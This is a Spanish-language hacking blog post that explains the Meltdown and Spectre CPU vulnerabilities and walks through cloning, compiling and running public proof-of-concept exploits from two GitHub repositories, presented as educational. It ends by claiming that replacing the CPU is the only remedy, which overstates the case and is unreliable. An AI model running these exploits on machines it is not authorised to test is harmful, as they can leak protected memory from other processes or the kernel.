Pentesting ,Hacking y Seguridad informatica

Explotando vulnerabilidades Meltdown y Spectre

El mundo tiembla ante Meltdown y Spectre

Meltdown y Spectre son dos vulnerabilidades criticas que fueron encontradas recientemente, permitiendo a los hackers robar información sensible, una de estas vulnerabilidades afecta a procesadores fabricados desde hace mas de 23 años.

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Sistemas afectados:

Hardware de CPU

Que son Meltdown y Spectre:

Meltdown es una falla de seguridad que permite a los hackers eludir la barrera de hardware entre las aplicaciones ejecutadas por los usuarios y la memoria del núcleo de la computadora.

Spectre es ligeramente diferente. Potencialmente, permite a los piratas informáticos engañar a las aplicaciones que de otro modo estarían libres de errores para obtener información secreta.

Explotación

Esta prueba de explotación se realiza con un fin educativo y se realiza bajo el siguiente procesador.

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Spectre (CVE-2017–5753 ,CVE-2017–5715)

1 – Descargamos el repositorio desde https://github.com/MangelZabala/Spectre

git clone https://github.com/MangelZabala/Spectre
cd Spectre/
ls

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

 

2 – Compilas el programa C con el siguiente comando:

gcc -std=c99 spectre.c

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

3 – Ahora ejecutamos la salida “a.out”

./a.out

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

PoC Fuentehttps://spectreattack.com/spectre.pdf

 

Meltdown (CVE-2017-5754)

 

1 – Descargamos el repositorio en github

git clone https://github.com/paboldin/meltdown-exploit
cd meltdown-exploit
ls

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

2 – Compilamos el exploit con el comando “make”

make

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

3 – ahora ejecutamos el .sh

sh run.sh

Vulnerabilidades Meltdown y Spectre: Que es y como explotar

Espero les sirva la información y la utilicen sabiamente, estas vulnerabilidades aun están en desarrollo y sus variantes pueden cambiar por lo tanto no existe una solución definitiva a los procesadores que tienen este fallo de seguridad, su recomendación es cambiar de CPU..( ͡° ͜ʖ ͡°) .

Saludos

0x00Sector!

 

 

1 thought on “Explotando vulnerabilidades Meltdown y Spectre

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *